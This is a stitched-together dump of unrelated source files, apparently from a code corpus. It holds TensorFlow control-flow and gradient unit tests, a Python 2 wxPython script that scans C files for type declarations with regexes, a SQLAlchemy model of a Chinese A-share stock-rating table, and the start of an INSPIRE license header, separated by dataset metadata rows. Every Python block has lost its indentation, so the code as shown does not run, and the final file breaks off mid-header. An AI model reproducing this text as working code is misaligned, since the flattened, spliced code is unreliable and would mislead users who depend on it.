tf.initialize_all_variables().run()
self.assertAllClose(216.0, r[0].eval())
def testWhileGrad_ys_xs(self):
with self.test_session():
x = tf.constant(3.0, name="x")
y = tf.constant(2.0, name="y")
c = lambda x, y: tf.less(x, 100.0)
def b(x, y):
y1 = tf.add(x, y)
x1 = tf.mul(x, y1)
return x1, y1
rx, ry = tf.while_loop(c, b, [x, y], parallel_iterations=1)
r = tf.gradients([rx, ry], x)
self.assertAllClose(304.0, r[0].eval())
r = tf.gradients([rx, ry], y)
self.assertAllClose(124.0, r[0].eval())
r = tf.gradients([rx], x)
self.assertAllClose(295.0, r[0].eval())
r = tf.gradients([rx], y)
self.assertAllClose(120.0, r[0].eval())
def testWhileGrad_Dependency(self):
with self.test_session():
i = tf.constant(0, name="i")
x = tf.constant(2.0, name="x")
c = lambda i, x: tf.less(i, 10)
def b(i, x):
x = tf.mul(x, 2.0)
i = tf.add(i, 1)
return i, x
ri, rx = tf.while_loop(c, b, [i, x], parallel_iterations=1)
r = tf.gradients([ri, rx], x)
self.assertAllClose(1024.0, r[0].eval())
r = tf.gradients([rx], x)
self.assertAllClose(1024.0, r[0].eval())
def testWhileGrad_NoGradient(self):
with self.test_session():
v = tf.constant(2.0, name="v")
c = lambda v: tf.less(v, 100.0)
b = tf.square
r = tf.while_loop(c, b, [v], back_prop=False)
r = tf.add(r, v)
r = tf.gradients(r, v)
self.assertAllClose(1.0, r[0].eval())
def testWhileGrad_NoDependency(self):
with self.test_session() as sess:
variable = tf.Variable(tf.ones([2, 3]))
time = tf.zeros([], dtype=tf.int32)
def cond(time, tensor, _):
return time < 10
def body(time, tensor, _):
return (time+1, tensor, tensor)
loop_vars = [time, variable, variable]
tensors = tf.while_loop(cond=cond, body=body, loop_vars=loop_vars)
cost = tf.reduce_sum(tensors[2])
grad = tf.gradients(cost, [variable])
tf.initialize_all_variables().run()
self.assertAllClose(np.ones([2, 3]), sess.run(grad[0]))
def testWhileGrad_Const(self):
with self.test_session() as sess:
c0 = tf.constant(0.0, name="c0")
c1 = tf.constant(1.0, name="c1")
time = tf.constant(0, name="t")
def cond(time, _):
return time < 1
def body(time, tensor):
return time+1, c1
loop_vars = [time, c0]
tensors = tf.while_loop(cond=cond, body=body, loop_vars=loop_vars)
cost = tf.reduce_sum(tensors[1])
grad = tf.gradients(cost, [c0])
self.assertAllClose(0.0, sess.run(grad[0]))
def testWhileGrad_SerialTwoLoops(self):
with self.test_session():
i = tf.constant(0, name="i")
x = tf.constant(2.0, name="x")
c = lambda i, x: tf.less(i, 5)
def b(i, x):
x = tf.mul(x, 2.0)
i = tf.add(i, 1)
return i, x
_, rx = tf.while_loop(c, b, [i, x], parallel_iterations=1)
_, rx = tf.while_loop(c, b, [i, rx], parallel_iterations=1)
r = tf.gradients([rx], x)
self.assertAllClose(1024.0, r[0].eval())
def testWhileGrad_ParallelTwoLoops(self):
with self.test_session():
i = tf.constant(0, name="i")
x = tf.constant(2.0, name="x")
c = lambda i, x: tf.less(i, 5)
def b(i, x):
x = tf.mul(x, 2.0)
i = tf.add(i, 1)
return i, x
_, r1 = tf.while_loop(c, b, [i, x], parallel_iterations=1)
_, r2 = tf.while_loop(c, b, [i, x], parallel_iterations=1)
rx = tf.add(r1, r2)
r = tf.gradients([rx], x)
self.assertAllClose(64.0, r[0].eval())
def _testNestedWhileGrad_Simple(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
v = tf.constant(1.0)
def inner_loop(s):
c = lambda x: tf.less(x, 4.0)
b = lambda x: tf.mul(x, 2.0)
return tf.while_loop(c, b, [s])
c = lambda x: tf.less(x, 2.0)
b = lambda x: tf.mul(inner_loop(x), 2.0)
r = tf.while_loop(c, b, [v])
r = tf.gradients(r, v)[0]
self.assertAllClose(8.0, r.eval())
def testNestedWhileGrad_Simple(self):
self._testNestedWhileGrad_Simple(use_gpu=False)
self._testNestedWhileGrad_Simple(use_gpu=True)
def testNestedWhileGrad_SerialInner(self):
with self.test_session():
v = tf.constant(1.0)
def inner_loop1(s):
z = tf.constant(0)
c = lambda i, x: tf.less(i, 4)
b = lambda i, x: [tf.add(i, 1), tf.mul(x, 2.0)]
return tf.while_loop(c, b, [z, s])
def inner_loop2(s):
z = tf.constant(0)
c = lambda i, x: tf.less(i, 4)
b = lambda i, x: [tf.add(i, 1), tf.mul(x, 2.0)]
return tf.while_loop(c, b, [z, s])
c = lambda x: tf.less(x, 128.0)
b = lambda x: inner_loop2(inner_loop1(x)[1])[1]
r = tf.while_loop(c, b, [v])
r = tf.gradients(r, v)[0]
self.assertAllClose(256.0, r.eval())
def testNestedWhileGrad_ParallelInner(self):
with self.test_session():
v = tf.constant(1.0)
def inner_loop1(s):
z = tf.constant(0)
c = lambda i, x: tf.less(i, 4)
b = lambda i, x: [tf.add(i, 1), tf.mul(x, 2.0)]
return tf.while_loop(c, b, [z, s])
def inner_loop2(s):
z = tf.constant(0)
c = lambda i, x: tf.less(i, 4)
b = lambda i, x: [tf.add(i, 1), tf.mul(x, 2.0)]
return tf.while_loop(c, b, [z, s])
c = lambda x: tf.less(x, 128.0)
b = lambda x: tf.mul(inner_loop1(x)[1], inner_loop2(x)[1])
r = tf.while_loop(c, b, [v])
r = tf.gradients(r, v)[0]
self.assertAllClose(512.0, r.eval())
def _testWhileCondGrad_Simple(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
v = tf.convert_to_tensor(2.0, name="v")
n = tf.convert_to_tensor(100.0, name="n")
one = tf.convert_to_tensor(1.0, name="one")
c = lambda x: tf.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(tf.constant(True),
lambda: tf.square(x),
lambda: tf.sub(x, one))
# pylint: enable=undefined-variable
r = tf.while_loop(c, b, [v])
r = tf.gradients(r, v)[0]
self.assertAllClose(1024.0, r.eval())
def testWhileCondGrad_Simple(self):
self._testWhileCondGrad_Simple(use_gpu=False)
self._testWhileCondGrad_Simple(use_gpu=True)
def testWhileCondGrad_UnknownShape(self):
with self.test_session() as sess:
v = tf.placeholder(tf.float32)
n = tf.convert_to_tensor(100.0, name="n")
one = tf.convert_to_tensor(1.0, name="one")
c = lambda x: tf.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(tf.constant(True),
lambda: tf.square(x),
lambda: tf.sub(x, one))
# pylint: enable=undefined-variable
r = tf.while_loop(c, b, [v])
r = tf.gradients(r, v)[0]
r = sess.run(r, feed_dict={v: 2.0})
self.assertAllClose(1024.0, r)
def testWhileWithRefsWithGradients_1(self):
with self.test_session() as sess:
x = tf.Variable(0).ref()
i = tf.constant(0)
c = lambda i, x: tf.less(i, 10)
self.assertEqual(x.dtype, tf.int32_ref)
# pylint: disable=protected-access
def body(i, x):
self.assertEqual(x.dtype, tf.int32_ref)
return (i+1, gen_array_ops._ref_identity(x))
# pylint: enable=protected-access
r = tf.while_loop(c, body, [i, x], parallel_iterations=5)
grad_ys = [tf.Variable(73).ref()]
grad = tf.gradients([r[1]], [x], grad_ys=grad_ys)
tf.initialize_all_variables().run()
self.assertEqual(r[0].dtype, tf.int32)
self.assertEqual(r[1].dtype, tf.int32_ref)
value_i, value_x, value_x_grad = sess.run(r + grad)
self.assertEqual(10, value_i)
self.assertEqual(0, value_x)
self.assertEqual(73, value_x_grad)
def testWhileGrad_IndexedSlices(self):
with self.test_session():
values = tf.constant([2.0, 4.0], name="values")
indices = tf.constant([0, 3], name="indices")
shape = tf.constant([10], name="dense_shape")
i = tf.constant(0)
x = tf.IndexedSlices(values, indices, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [i + 1, tf.IndexedSlices(x.values * 2.0, x.indices,
x.dense_shape)]
_, r = tf.while_loop(c, b, [i, x])
r = tf.gradients(r.values, values)[0]
self.assertAllClose(np.array([1024.0, 1024.0]), r.eval())
def testWhileGrad_SparseTensor(self):
with self.test_session():
values = tf.constant([2.0, 4.0], name="values")
indices = tf.constant([[0], [3]], dtype=tf.int64, name="indices")
shape = tf.constant([10], dtype=tf.int64, name="dense_shape")
i = tf.constant(0)
x = tf.SparseTensor(indices, values, shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [i + 1, tf.SparseTensor(x.indices, x.values * 2.0,
x.shape)]
_, r = tf.while_loop(c, b, [i, x])
r = tf.gradients(r.values, values)[0]
self.assertAllClose(np.array([1024.0, 1024.0]), r.eval())
def testCallGradInLoop(self):
with self.test_session() as sess:
i0 = tf.constant(0)
params = tf.constant(5.0)
params_1 = tf.square(params)
def c(i, _):
return i < 10
def b(i, x):
data = tf.constant([1.0, 2.0, 3.0])
data = tf.mul(data, params_1)
x1 = x + tf.gradients(data, params)[0]
return i + 1, x1
output_grad = tf.while_loop(c, b, [i0, tf.constant(0.0)])
self.assertAllClose(600.0, sess.run(output_grad)[1])
def testWhileGradGrad(self):
theta = tf.Variable(initial_value=1.)
def fn(x, prev):
return prev + x * theta
result = tf.scan(fn, [1., 2., 3.])
grad_theta = tf.gradients(result, theta)
with self.assertRaisesRegexp(TypeError, "Second-order gradient"):
tf.gradients(grad_theta, theta)
def testOneValueCond(self):
with self.test_session():
c = tf.placeholder(tf.int32, shape=[])
one = tf.convert_to_tensor(1, name="one")
two = tf.convert_to_tensor(2, name="two")
p = tf.greater_equal(c, 1)
i = tf.cond(p, lambda: one, lambda: two)
self.assertTrue(isinstance(i, tf.Tensor))
# True case: c = 2 is >= 1
self.assertEqual([1], i.eval(feed_dict={c: 2}))
# False case: c = 0 is not >= 1
self.assertEqual([2], i.eval(feed_dict={c: 0}))
def testExampleCond(self):
with self.test_session():
x = tf.convert_to_tensor([-2.0, 2.0], name="x")
d = tf.placeholder(tf.int32, shape=[])
def l2():
return tf.sqrt(tf.reduce_sum(tf.square(x)))
def l1():
return tf.reduce_sum(tf.abs(x))
i = tf.cond(tf.equal(d, 2), l2, l1)
self.assertAllClose(4.0, i.eval(feed_dict={d: 1}))
self.assertAllClose(2.0 * math.sqrt(2), i.eval(feed_dict={d: 2}))
def testCase(self):
with self.test_session():
x = tf.constant(1)
y = tf.constant(2)
z = tf.constant(3)
f1 = lambda: tf.constant(17)
f2 = lambda: tf.constant(23)
f3 = lambda: tf.constant(-1)
r1 = tf.case({x < y: f1, x > z: f2}, default=f3, exclusive=True)
self.assertAllEqual(r1.eval(), 17)
r2 = tf.case([(y > z, f1), (y > x, f2)], default=f3)
self.assertAllEqual(r2.eval(), 23)
# Duplicate events can happen, first one is selected
r3 = tf.case([(x < y, f1), (x < y, f2)], default=f3)
self.assertAllEqual(r3.eval(), 17)
# Duplicate events cause an error if exclusive = True
r4 = tf.case([(x < y, f1), (x < y, f2)], default=f3, exclusive=True)
with self.assertRaisesOpError(
"More than one condition evaluated as True but exclusive=True."):
r4.eval()
# Check that the default is called if none of the others are
r5 = tf.case({x > y: f1}, default=f3)
self.assertAllEqual(r5.eval(), -1)
ran_once = [False, False, False]
def break_run_twice(ix):
def _break():
ran_once[ix] = True
return tf.constant(ix)
return _break
# Should not fail - each conditional gets called exactly once
# except default. Default gets called twice: once to create an
# empty output and once for the actual cond switch.
r6 = tf.case([(x < y, break_run_twice(0)), (x > y, break_run_twice(1))],
default=lambda: tf.constant(2))
self.assertAllEqual(r6.eval(), 0)
def testCaseSideEffects(self):
with self.test_session() as sess:
v0 = tf.Variable(-1)
v1 = tf.Variable(-1)
v2 = tf.Variable(-1)
a = lambda: control_flow_ops.with_dependencies([tf.assign(v0, 0)], 0)
b = lambda: control_flow_ops.with_dependencies([tf.assign(v1, 1)], 1)
c = lambda: control_flow_ops.with_dependencies([tf.assign(v2, 2)], 2)
x = tf.constant(1)
y = tf.constant(2)
r0 = tf.case(((x < y, a), (x > y, b)), default=c, exclusive=True)
r1 = tf.case(((x > y, a), (x < y, b)), default=c, exclusive=True)
r2 = tf.case(((x > y, a), (x > y, b)), default=c, exclusive=True)
tf.initialize_all_variables().run()
self.assertAllEqual(sess.run([v0, v1, v2]), [-1] * 3)
self.assertEqual(2, r2.eval())
self.assertAllEqual(sess.run([v0, v1, v2]), [-1, -1, 2])
tf.initialize_all_variables().run()
self.assertAllEqual(sess.run([v0, v1, v2]), [-1] * 3)
self.assertEqual(1, r1.eval())
self.assertAllEqual(sess.run([v0, v1, v2]), [-1, 1, -1])
tf.initialize_all_variables().run()
self.assertAllEqual(sess.run([v0, v1, v2]), [-1] * 3)
self.assertEqual(0, r0.eval())
self.assertAllEqual(sess.run([v0, v1, v2]), [0, -1, -1])
def testOneOpCond(self):
with self.test_session():
v = tf.Variable(0)
c = tf.convert_to_tensor(0)
one = tf.convert_to_tensor(1)
two = tf.convert_to_tensor(2)
p = tf.greater_equal(c, 1)
def a():
return tf.assign(v, one)
def b():
return tf.assign(v, two)
i = tf.cond(p, a, b)
self.assertTrue(isinstance(i, tf.Tensor))
tf.initialize_all_variables().run()
self.assertEqual(0, v.eval())
# True case: c = 2 is >= 1, v is set to 1.
self.assertEqual(1, i.eval(feed_dict={c.name: 2}))
self.assertEqual(1, v.eval())
# False case: c = 0 is not >= 1, v is set to 2.
self.assertEqual(2, i.eval(feed_dict={c.name: 0}))
self.assertEqual(2, v.eval())
def testWithOpsDependencies(self):
with self.test_session() as sess:
v = tf.Variable(0.0)
c = tf.constant(10)
# Fetching v directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
sess.run([c, v])
# Use a control dependency to ensure init_variable is run
# while asking for c
real_v = control_flow_ops.with_dependencies(
name="real_tensor",
output_tensor=v.ref(),
dependencies=[v.initializer])
c_val, real_v_val = sess.run([c, real_v])
# Ensure the result of 'real_c' is the same as 'c'
self.assertAllEqual(10, c_val)
# Ensure that 'v' is initialized
self.assertAllClose(0.0, real_v_val)
def testWithTensorDependencies(self):
with self.test_session():
v = tf.Variable(0.0)
c1 = tf.constant(10)
c2 = tf.constant(20)
# c1_with_init_v depends on the init op for v
c1_with_init_v = control_flow_ops.with_dependencies(
name="c1_with_init_v",
output_tensor=c1,
dependencies=[v.initializer])
# c2_with_c1 depends on the value of c1_with_init_v
c2_with_c1_dep = control_flow_ops.with_dependencies(
name="c2_with_c1_dep",
output_tensor=c2,
dependencies=[c1_with_init_v])
# Fetching v directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v.eval()
# Get the value of 'c2_with_c1_dep', which should cause 'v'
# to be initialized.
self.assertAllEqual(20, c2_with_c1_dep.eval())
# Ensure that 'v' is initialized
self.assertAllClose(0.0, v.eval())
def testWithIndexedSlicesDependencies(self):
with self.test_session():
v = tf.Variable(
np.array([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]]).astype(np.float32))
v_at_1 = tf.IndexedSlices(v, tf.constant([1]))
gather_v_at_1 = tf.gather(v_at_1.values, v_at_1.indices)
v_at_1_after_init = control_flow_ops.with_dependencies([v.initializer],
v_at_1)
gather_v_at_1_after_init = tf.gather(
v_at_1_after_init.values, v_at_1_after_init.indices)
# Fetching gather_v_at_1 will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
gather_v_at_1.eval()
# Getting gather_v_at_1_after_init will work, and initialize v.
self.assertAllEqual([[10.0, 11.0]], gather_v_at_1_after_init.eval())
# Double check that 'v' is initialized
self.assertAllClose([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]], v.eval())
def testDependenciesDevice(self):
with tf.Graph().as_default():
# device set on tensor => same device on dep.
with tf.device("/job:ps"):
vd = tf.Variable([0.0])
with_vd_dep = control_flow_ops.with_dependencies([vd.initializer], vd)
self.assertTrue("/job:ps" in with_vd_dep.device)
# No device set on tensor => no device on dep.
vnod = tf.Variable([0.0])
with_vnod_dep = control_flow_ops.with_dependencies([vnod.initializer],
vnod)
self.assertDeviceEqual(None, with_vnod_dep.device)
# device set on tensor, default device on graph => default device on dep.
vdef = tf.Variable([0.0], name="vdef")
with tf.device("/job:worker/gpu:1"):
with_vdef_dep = control_flow_ops.with_dependencies([vdef.initializer],
vdef)
# The device is empty, but the colocation constraint is set.
self.assertDeviceEqual("", with_vdef_dep.device)
self.assertEqual([b"loc:@vdef"],
with_vdef_dep.op.colocation_groups())
def testGroup(self):
with self.test_session() as sess:
v1 = tf.Variable([0.0])
v2 = tf.Variable([1.0])
# Group init1 and init2 and run.
init = control_flow_ops.group(v1.initializer, v2.initializer)
# Fetching v1 directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v1.eval()
# Runs "init" before fetching v1 and v2.
init.run()
v1_val, v2_val = sess.run([v1, v2])
# Ensure that v1 and v2 are initialized
self.assertAllClose([0.0], v1_val)
self.assertAllClose([1.0], v2_val)
def testGroupEmpty(self):
op = tf.group()
self.assertEqual(op.type, "NoOp")
self.assertEqual(op.control_inputs, [])
def testMergeShapes(self):
# All inputs unknown.
p1 = tf.placeholder(tf.float32)
p2 = tf.placeholder(tf.float32)
p3 = tf.placeholder(tf.float32)
m, index = control_flow_ops.merge([p1, p2, p3])
self.assertIs(None, m.get_shape().ndims)
self.assertEqual([], index.get_shape())
# All inputs known with different ranks.
p1 = tf.placeholder(tf.float32, shape=[1, 2])
p2 = tf.placeholder(tf.float32, shape=[1, 2, 3])
m, index = control_flow_ops.merge([p1, p2])
self.assertIs(None, m.get_shape().ndims)
self.assertEqual([], index.get_shape())
# All inputs known with some dimensions different.
p1 = tf.placeholder(tf.float32, shape=[1, 2])
p2 = tf.placeholder(tf.float32, shape=[2, 1])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, None], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = tf.placeholder(tf.float32, shape=[1, 2])
p2 = tf.placeholder(tf.float32, shape=[None, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = tf.placeholder(tf.float32, shape=[1, 2])
p2 = tf.placeholder(tf.float32, shape=[2, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
# All inputs known with same dimensions.
p1 = tf.placeholder(tf.float32, shape=[1, 2])
p2 = tf.placeholder(tf.float32, shape=[1, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([1, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = tf.placeholder(tf.float32, shape=[None, 2])
p2 = tf.placeholder(tf.float32, shape=[None, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = tf.placeholder(tf.float32, shape=[None, None])
p2 = tf.placeholder(tf.float32, shape=[None, None])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, None], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
def testRefSelect(self):
index = tf.placeholder(tf.int32)
# All inputs unknown.
p1 = tf.placeholder(tf.float32)
p2 = tf.placeholder(tf.float32)
p3 = tf.placeholder(tf.float32)
v1 = tf.Variable(p1, validate_shape=False)
v2 = tf.Variable(p2, validate_shape=False)
v3 = tf.Variable(p3, validate_shape=False)
s = control_flow_ops.ref_select(index, [v1, v2, v3])
self.assertIs(None, s.get_shape().ndims)
# All inputs known but different.
v1 = tf.Variable([[1, 2]])
v2 = tf.Variable([[2], [1]])
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertIs(None, s.get_shape().ndims)
# All inputs known and same.
v1 = tf.Variable([[1, 2]])
v2 = tf.Variable([[1, 2]])
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertEqual([1, 2], s.get_shape())
# Possibly the same but not guaranteed.
v1 = tf.Variable([[1., 2.]])
p2 = tf.placeholder(tf.float32, shape=[None, 2])
v2 = tf.Variable(p2, validate_shape=False)
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertEqual(None, s.get_shape())
def testRunLoopTensor(self):
with self.test_session() as sess:
tensor_list = []
def condition(t):
return t < tf.constant(5)
def body(_):
tensor_list.append(tf.constant(5))
return tf.constant(10)
result = tf.while_loop(condition, body, [tf.constant(4)])
self.assertEqual(10, sess.run(result))
# Ensure that we cannot run a tensor that escapes the loop body
# accidentally.
with self.assertRaises(ValueError):
sess.run(tensor_list[0])
class TupleTest(tf.test.TestCase):
def testTensors(self):
for v1_first in [True, False]:
with self.test_session():
v1 = tf.Variable([1.0])
add1 = tf.add(
control_flow_ops.with_dependencies([v1.initializer], v1.ref()),
2.0)
v2 = tf.Variable([10.0])
add2 = tf.add(
control_flow_ops.with_dependencies([v2.initializer], v2.ref()),
20.0)
t1, _, t2 = control_flow_ops.tuple([add1, None, add2])
# v1 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v1.eval()
# v2 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v2.eval()
if v1_first:
# Getting t1 initializes v2.
self.assertAllClose([3.0], t1.eval())
self.assertAllClose([10.0], v2.eval())
else:
# Getting t2 initializes v1.
self.assertAllClose([30.0], t2.eval())
self.assertAllClose([1.0], v1.eval())
def testIndexedSlices(self):
for v1_first in [True, False]:
with self.test_session():
v1 = tf.Variable(
np.array([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]]).astype(
np.float32))
v1_at_1 = tf.IndexedSlices(
control_flow_ops.with_dependencies([v1.initializer], v1.ref()),
tf.constant([1]))
v2 = tf.Variable(
np.array([[0.1, 1.1], [10.1, 11.1], [20.1, 21.1]]).astype(
np.float32))
v2_at_1 = tf.IndexedSlices(
control_flow_ops.with_dependencies([v2.initializer], v2.ref()),
tf.constant([1]))
st1, st2 = control_flow_ops.tuple([v1_at_1, v2_at_1])
g1 = tf.gather(st1.values, st1.indices)
g2 = tf.gather(st2.values, st2.indices)
# v1 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v1.eval()
# v2 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v2.eval()
if v1_first:
# Getting g1 initializes v2.
self.assertAllClose([[10.0, 11.0]], g1.eval())
self.assertAllClose([[0.1, 1.1], [10.1, 11.1], [20.1, 21.1]],
v2.eval())
else:
# Getting g2 initializes v1.
self.assertAllClose([[10.1, 11.1]], g2.eval())
self.assertAllClose([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]],
v1.eval())
def testAcceptTensorsAsControlInputs(self):
with self.test_session():
var = tf.Variable(0)
assign = tf.assign(var, 1)
t, = tf.tuple([tf.constant(0)], control_inputs=[assign])
# Should trigger the assign.
t.eval()
self.assertEquals(1, var.eval())
def testWhilePyFuncBasic(self):
def func(x):
return np.square(x)
with self.test_session():
r = tf.while_loop(
lambda i, v: i < 4,
lambda i, v: [i + 1, tf.py_func(func, [v], [tf.float32])[0]],
[tf.constant(0), tf.constant(2.0, tf.float32)])
self.assertEqual(r[1].eval(), 65536.0)
def testWhileFuncBasic(self):
@function.Defun(tf.float32)
def func(x):
return tf.square(tf.square(x))
with self.test_session():
x = tf.constant(2.0, tf.float32)
r = tf.while_loop(
lambda i, v: i < 2,
lambda i, v: [i + 1, func(v)],
[tf.constant(0), x])
self.assertEqual(r[1].eval(), 65536.0)
r = tf.gradients(r, x)[0]
self.assertEqual(r.eval(), 524288.0)
self.assertEqual(len([op for op in x.graph.get_operations()
if op.type == "Stack"]),
1)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 | 7,064,295,795,435,686,000 | 32.60181 | 80 | 0.57536 | false |
gamesun/MyCdecl | main.py | 1 | 5018 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# Copyright (c) 2013, gamesun
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of gamesun nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY GAMESUN "AS IS" AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL GAMESUN BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import wx
import os
import re
QUALIFIER = ("const", "volatile", "signed", "unsigned")
BASICTYPE = ("void", "char", "short", "int", "long",
"float", "double", "struct", "enum", "union")
regex_matchEnum = re.compile(r'enum[\s\S]*?\{[\s\S]*?\}\s(?P<enum>\w+)')
regex_matchUnion = re.compile(r'union[\s\S]*?\{(?:[^{}]|\{[^{}]*\})*\}\s(?P<enum>\w+)')
regex_matchStruct = re.compile(r'struct[\s\S]*?\{[\s\S]*?\}\s(?P<enum>\w+)')
regex_matchType = re.compile(r'typedef\s.*?(?P<type>\w+);')
class MyApp(wx.App):
def OnInit(self):
path = os.getcwd()
self.DeclarationAnalysis(path)
return True
def DeclarationAnalysis(self, path):
typeDecl = self.FindAllTypeDecl(path)
print typeDecl[0]
print typeDecl[1]
print typeDecl[2]
print typeDecl[3]
print
variableList = self.FindAllVariable(path, typeDecl)
print variableList[0]
print variableList[1]
print variableList[2]
print variableList[3]
def FindAllVariable(self, path, typeDecl):
""" return as []
"""
variableList = [['enum', []],
['union', []],
['srtuct', []],
['type', []]]
for dirpath, dirnames, filenames in os.walk(path):
for filename in filenames:
extension = os.path.splitext(filename)[1]
if extension == '.h' or extension == '.c':
filepath = os.path.join(dirpath, filename)
f = open(filepath, "rb")
string = f.read()
f.close()
for e in typeDecl[0][1]:
variableList[0][1] += re.findall('%s\s+(\w+);' % e, string)
for u in typeDecl[1][1]:
variableList[1][1] += re.findall('%s\s+(\w+);' % u, string)
for s in typeDecl[2][1]:
variableList[2][1] += re.findall('%s\s+(\w+);' % s, string)
for t in typeDecl[3][1]:
variableList[3][1] += re.findall('%s\s+(\w+);' % t, string)
return variableList
def FindAllTypeDecl(self, path):
""" return as [ (enum,(,,,)),
(union,(,,,)),
(struct,(,,,)),
[type,[,,,]] ] """
result = [['enum', []],
['union', []],
['srtuct', []],
['type', []]]
for dirpath, dirnames, filenames in os.walk(path):
for filename in filenames:
extension = os.path.splitext(filename)[1]
if extension == '.h' or extension == '.c':
filepath = os.path.join(dirpath, filename)
f = open(filepath, "rb")
string = f.read()
f.close()
result[0][1] += regex_matchEnum.findall(string)
result[1][1] += regex_matchUnion.findall(string)
result[2][1] += regex_matchStruct.findall(string)
result[3][1] += regex_matchType.findall(string)
result[3][1] += BASICTYPE
return result
if __name__ == '__main__':
app = MyApp(0)
app.MainLoop()
| bsd-3-clause | -6,601,908,336,828,603,000 | 38.144 | 100 | 0.535273 | false |
SnowWalkerJ/quantlib | quant/data/wind/tables/asharestockrating.py | 1 | 2127 | from ....common.db.sql import VARCHAR, Numeric as NUMBER, DateTime as DATETIME, Column, BaseModel, CLOB, DATE
VARCHAR2 = VARCHAR
class AShareStockRating(BaseModel):
"""
4.75 中国A股投资评级明细
Attributes
----------
object_id: VARCHAR2(100)
对象ID
s_info_windcode: VARCHAR2(40)
Wind代码
s_est_institute: VARCHAR2(100)
研究机构名称
s_est_ratinganalyst: VARCHAR2(100)
分析师名称
s_est_estnewtime_inst: VARCHAR2(8)
评级日期
s_est_scorerating_inst: NUMBER(20,4)
本次标准评级
s_est_prescorerating_inst: NUMBER(20,4)
前次标准评级
s_est_lowprice_inst: NUMBER(20,4)
本次最低目标价
s_est_highprice_inst: NUMBER(20,4)
本次最高目标价
s_est_prelowprice_inst: NUMBER(20,4)
前次最低目标价
s_est_prehighprice_inst: NUMBER(20,4)
前次最高目标价
ann_dt: VARCHAR2(8)
公告日期(内部) 记录了盈利预测信息到达万得平台的时间, 该字段精确到”日”, 未保存具体的时点。
s_est_rating_inst: VARCHAR(20)
本次评级
s_est_prerating_inst: VARCHAR(20)
前次评级
opdate: DATETIME
opdate
opmode: VARCHAR(1)
opmode
"""
__tablename__ = "AShareStockRating"
object_id = Column(VARCHAR2(100), primary_key=True)
s_info_windcode = Column(VARCHAR2(40))
s_est_institute = Column(VARCHAR2(100))
s_est_ratinganalyst = Column(VARCHAR2(100))
s_est_estnewtime_inst = Column(VARCHAR2(8))
s_est_scorerating_inst = Column(NUMBER(20,4))
s_est_prescorerating_inst = Column(NUMBER(20,4))
s_est_lowprice_inst = Column(NUMBER(20,4))
s_est_highprice_inst = Column(NUMBER(20,4))
s_est_prelowprice_inst = Column(NUMBER(20,4))
s_est_prehighprice_inst = Column(NUMBER(20,4))
ann_dt = Column(VARCHAR2(8))
s_est_rating_inst = Column(VARCHAR(20))
s_est_prerating_inst = Column(VARCHAR(20))
opdate = Column(DATETIME)
opmode = Column(VARCHAR(1))
| gpl-3.0 | 3,560,199,213,089,072,600 | 29.5 | 109 | 0.619249 | false |
nikpap/inspire-next | inspirehep/modules/workflows/tasks/classifier.py | 1 | 4238 | # -*- coding: utf-8 -*-
#
# This file is part of INSPIRE.
# Copyright (C) 2015 CERN.
#
# INSPIRE is free software; you can redistribute it and/or
